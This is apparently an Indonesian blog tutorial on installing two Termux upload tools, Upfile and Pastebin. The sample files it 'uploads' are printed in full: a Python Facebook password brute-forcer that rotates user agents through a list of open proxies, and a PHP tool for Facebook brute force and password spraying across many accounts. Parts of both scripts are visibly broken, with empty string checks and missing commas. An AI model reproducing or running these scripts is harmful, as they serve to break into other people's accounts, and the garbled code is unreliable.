Kumpulan Tool Untuk Upload Dan Menyimpan File Ke Website

Kumpulan beberapa tool untuk upload/simpan file ke website tertentu menggunakan termux. Dan beberapa di antaranya akan saya coba share di artikel senitopeng.xyz ini. Langsung saja saya mulai untuk tool yang pertama.



1. Tool Upfile

Tool atau script ini gunanya untuk upload file kamu atau menyimpan file kamu ke website upfile mobi . Upfile mobi adalah tempat upload dan download file. Kurang lebih seperti Media Fire dan Github.
Bedanya mediafire dan upfile tidak pake git clone. Mereka system upload dan download.


List Bahan Install

  1. apt update && apt upgrade -y
  2. cd /storage/emulated/0/
  3. apt install python
  4. apt install unzip
  5. apt install requests
  6. pip install --upgrade pip
  7. git clone https://github.com/Senitopeng/Upfile.git


Untuk cara installnya silahkan copy satu2 tutor di bawah ini dan paste ke termux.


Cara Install Upfile

Update Dan Upgrade
apt update && apt upgrade -y

Masuk Ke Sdcard
cd /storage/emulated/0/

Install Python
apt install python

Install Unzip
apt install unzip

Install Requests
apt install requests

Upgrade Pip
pip install --upgrade pip

Cloning Script
git clone https://github.com/Senitopeng/Upfile.git

Masuk Folder
cd Upfile

Extrax Zip
unzip Upfile.zip

Cara Menjalankan
python Upfile.py (FileYangInginKamuUpload)


Contoh Saya Upload File Fbbrute :
python Upfile.py Fbbrute.py


Gambar :



Muncul Link Download File :
http://upfile.mobi/WEuQhUDFVbJ


Gambar Hasil File Yang Saya Upload :



Note : Taruh file yang akan di upload ke dalam folder Upfile



Contoh Video Upload Dan Download :





Contoh di atas itu saya upload file Fbbrute.py yang isi filenya kurang lebih seperti ini :

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests , time , os , random
from bs4 import BeautifulSoup

W  = '\033[0m'
R  = '\033[1;31m'
G  = '\033[1;32m'
O  = '\033[1;33m'
B  = '\033[1;34m'
P  = '\033[1;35m'
C  = '\033[1;36m'
GR = '\033[1;37m'

ua = [
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
    'Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
    'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
    #Firefox
    'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)',
    'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
    'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',
    'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
    'Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko',
    'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
    'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)',
    'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
    'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
    'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko',
    'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
    'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
    'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
]

prox = [
    'http://10.10.1.10:3128',
    'http://77.232.139.200:8080',
    'http://78.111.125.146:8080',
    'http://77.239.133.146:3128',
    'http://74.116.59.8:53281',
    'http://67.53.121.67:8080',
    'http://67.78.143.182:8080',
    'http://62.64.111.42:53281',
    'http://62.210.251.74:3128',
    'http://62.210.105.103:3128',
    'http://5.189.133.231:80',
    'http://46.101.78.9:8080',
    'http://45.55.86.49:8080',
    'http://40.87.66.157:80',
    'http://45.55.27.246:8080',
    'http://45.55.27.246:80',
    'http://41.164.32.58:8080',
    'http://45.125.119.62:8080',
    'http://37.187.116.199:80',
    'http://43.250.80.226:80',
    'http://43.241.130.242:8080',
    'http://38.64.129.242:8080',
    'http://41.203.183.50:8080',
    'http://36.85.90.8:8080',
    'http://36.75.128.3:80',
    'http://36.81.255.73:8080',
    'http://36.72.127.182:8080',
    'http://36.67.230.209:8080',
    'http://35.198.198.12:8080',
    'http://35.196.159.241:8080',
    'http://35.196.159.241:80',
    'http://27.122.224.183:80',
    'http://223.206.114.195:8080',
    'http://221.120.214.174:8080',
    'http://223.205.121.223:8080',
    'http://222.124.30.138:80',
    'http://222.165.205.204:8080',
    'http://217.61.15.26:80',
    'http://217.29.28.183:8080',
    'http://217.121.243.43:8080',
    'http://213.47.184.186:8080',
    'http://207.148.17.223:8080',
    'http://210.213.226.3:8080',
    'http://202.70.80.233:8080',
]

def Brute():
    URL = 'https://m.facebook.com/login'
    os.system('figlet TARGET')
    print('='*29)
    email = raw_input(C+' IDTarget '+R+'> '+W)
    wlist = raw_input(C+' Wordlist '+R+'> '+W)
    print ('='*29)
    passwd = open(wlist, 'r')
    for password in passwd:
        form_data = {
            'email' : email,
            'pass' : password
        }
        user_agent = random.choice(ua)
        headers = {'User-Agent': user_agent}
        proxies_a = random.choice(prox)
        proxies = {'http': proxies_a}
        with requests.Session() as c:
            c.get(URL, headers=headers, proxies=proxies)
            r = c.post(URL, data=form_data, headers=headers, proxies=proxies)
            b = c.get('https://m.facebook.com/home.php', headers=headers, proxies=proxies)
            soup = BeautifulSoup(b.content, 'html.parser')
            a = soup.find('title')
            if(str(a) == ''):
                print(C+' ['+R+' Tidak Cocok '+C+']'+R+' => '+W+email+' : '+password)
            elif(str(a) == ''):
                print(C+' ['+G+' OK '+C+']'+R+' > '+W+password)
                print(C+' ['+W+' Result '+C+']'+R+' > '+G+'Success')
                print(C+' ['+W+' Password '+C+']'+R+' > '+W+password)

try:
  Brute()
except(ImportError):
  exit()

(Selesai Tool Upfile)



=====================================




2. Tool Pastebin

Tool yang kedua ini adalah tool pastebin yang kegunaannya untuk upload/simpan file ke website Pastebin. Mungkin banyak di antara kalian yang sudah tau tentang website tersebut. Tempat upload, download berbagai tool/script untuk termux, dan juga script yang ada di pastebin ini selain bisa di download juha bisa langsung di wget lewat termux.



List Bahan Install

  1. apt update && apt upgrade -y
  2. apt install python
  3. cd /storage/emulated/0/
  4. apt install unzip
  5. apt install requests
  6. pip install --upgrade pip
  7. git clone https://github.com/Senitopeng/Pastebin.git


Copy satu2 tutor di bawah lalu paste ke termux. Atau ketik sendiri di termux masing2.


Cara Install Pastebin


Update Dan Upgrade
apt update && apt upgrade -y

Masuk Ke Sdcard
cd /storage/emulated/0/

Install Python
apt install python

Install Unzip
apt install unzip

Install Requests
apt install requests

Upgrade Pip
pip install --upgrade pip

Masuk Ke Sdcard
cd /storage/emulated/0/

Cloning Script
git clone https://github.com/Senitopeng/Pastebin.git

Masuk Folder
cd Pastebin

Extrax Zip
unzip Pastebin.zip

Cara Menjalankan
python Pastebin.py upload


Akan muncul pengisian kurang lebih seperti ini


  1. Uploads File  :  (Isi Dengan File Yang Mau Di Upload )
  2. Program File : (Program Yang Kamu Upload. Contoh : python, php, txt, node DLL)


Contoh file yang saya upload adalah program php maka saya tulis di pengisian program dengan php


Ini contoh gambar yang saya isi.

Gambar :



Setelah gambar atas. Sebelum linknya di share, coba cek link orinya dengan cara copy link ori tadi lalu paste di google untuk memastikan ada verfikasi chacha atau tidak.

Bila muncul permintaan verfikasi chapcha maka silahkan isi saja. (Biasanya verfikasi hanya satu kali saja untuk setipa file, itupun kadang2)


Contoh Gambar Verfikasi :



Kalau Tidak Ada Verfikasi biasanya akan langsung bisa di download atau di wget lewat termux

Gambar :


Contoh di atas yang saya upload adalah file mbf versi php program php. Berikut isi filenya :


@system('clear');
error_reporting(0);
$blue="\033[1;34m";
$cyan="\033[1;36mm";
$green="\033[1;32m";
$okegreen="\033[92m";
$lightgreen="\033[1;32m";
$white="\033[1;37m";
$red="\033[1;31m";
$yellow="\033[1;33m";
$banner="\n $red
  _____                         ___.                     __
_/ ____\_____     ____    ____  \_ |__    ____    ____  |  | __
\   __\ \__  \  _/ ___\ _/ __ \  | __ \  /  _ \  /  _ \ |  |/ /
|  |    / __ \_\  \___ \  ___/  | \_\ \(  <_>)(  <_>)|    <
|__|   (____  / \___  > \___  > |___  / \____/  \____/ |__|_ \
             \/      \/      \/      \/                      \/
$white " ;
function fb($user, $pass) {
$fileua = 'user-agents.txt';
$useragent = $fileua[rand(0count($fileua) - 1)];
$cookie = 'cookie.txt';
touch($kuki);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://m.facebook.com/login.php');
curl_setopt($ch, CURLOPT_POSTFIELDS, 'email='.$user.'&pass='.$pass.'&login=Login');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_REFERER, 'http://m.facebook.com');
$output = curl_exec($ch) or die('Can\'t access '.$url);
if(stristr($output'') || stristr($output'id="checkpointSubmitButton"')) {
return TRUE;
else {
return FALSE;
}
}
function mfb($pass, $user) {
$fileua = 'user-agents.txt';
$useragent = $fileua[rand(0count($fileua) - 1)];
  $cookie = 'cookie.txt';
  touch ($cookie);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://m.facebook.com/login.php');
curl_setopt($ch, CURLOPT_POSTFIELDS, 'pass='.$pass.'&email='.$user.'&login=Login');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_REFERER, 'https://m.facebook.com');
$output = curl_exec($ch) or die('Can\'t access '.$url);
if(stristr($output'') || stristr($output'id="checkpointSubmitButton"')) {
return TRUE;
else {
return FALSE;
}
}
function bf() {
  $file = $_SERVER[argv][0];
  echo "\n\e[1;32m[+]\e[1;34m masukan id : \e[0m";
  $user=trim(fgets(STDIN));
  echo "\n\e[1;32m[+]\e[1;34m masukan passlist : \e[0m";
  $wordlist=trim(fgets(STDIN));
  if(!empty($user) && !empty($wordlist)) {
    $passlist = file($wordlist);
    $passcount = count($passlist);
    print "\n\e[1;33m[!] \e[1;32mmengecheck \e[1;35m".$passcount." \e[1;33mpassword..\n\e[0m";
    foreach($passlist as $password) {
      $pass = substr($password0strlen($password) - 1);
      if(fb(urlencode($user), urlencode($pass))) {
        print "\n\e[1;33m".$pass." : \e[1;32mOK\n\e[0m";
      } else {
        print "\n\e[1;33m".$pass." : \e[1;31mError\n\e[0m";
      }
    }
  }
}
function mbf() {
  $file = $_SERVER[argv][0];
  echo "\n\e[1;32m[+] \e[1;34mmasukan password : \e[0m";
  $pass=trim(fgets(STDIN));
  echo "\n\e[1;32m[+] \e[1;34mmasukan userlist : \e[0m";
  $wordlist=trim(fgets(STDIN));
  if(!empty($pass) && !empty($wordlist)) {
    $passlist = file($wordlist);
    $passcount = count($passlist);
    print "\n\e[1;33m[!] \e[1;32mMengecheck \e[1;35m".$passcount." \e[1;33muser..\n\e[0m";
    foreach($passlist as $password) {
      $user = substr($password0strlen($password) - 1);
      if(mfb(urlencode($pass), urlencode($user))) {
        print "\n\e[1;33m".$user." : \e[1;32mOK\n";
      } else {
        print "\n\e[1;33m".$user." : \e[1;31mError\n\e[0m";
      }
    }
  }
}
function login(){
  $file = $_SERVER[argv][0];
  echo "\n\e[1;32m[+]\e[1;34m id : \e[0m";
  $user=trim(fgets(STDIN));
  echo "\n\e[1;32m[+]\e[1;34m password : \e[0m";
  $pass=trim(fgets(STDIN));
  print "\n\e[1;33m Sedang Login.....\n";
  if(fb(urlencode($user), urlencode($pass))) {
    print "\n\e[1;32mLogin Sukses";
  }else{
    print "\n\e[1;31mlogin gagal\n";
  }
}
print $banner;
print "\n
\033[1;33m[1]\033[1;34m Bruteforce Facebook
\033[1;33m[2]\033[1;34m Multi Bruteforce Facebook
\033[1;33m[3]\033[1;34m Login Facebook
\033[1;33m[4] \033[1;31mExit\n";
echo " \n\033[1;32m[*] \033[1;33mInput Nomor : \033[0m";
$nomor=trim(fgets(STDIN));
if($nomor=="1"){
  bf();
}elseif($nomor=="2"){
  mbf();
}elseif($nomor=="3"){
  login();
}elseif($nomor=="4"){
  @system('exit');
}else{
  print "\033[1;31mcommand not found";
}
?>

(Selesai Pastebin)

=====================================


Sampai disini dulu untuk artikel senitopeng.xyz hari ini tentang beberapa kumpulan tool untuk upload file ke website. Apabila ada pertanyaan seputar artikel di atas maka silahkan kirim pesan lewat contact yang ada di bagian menu di atas artikel. Terima Kasih.

0 Response to "Kumpulan Tool Untuk Upload Dan Menyimpan File Ke Website"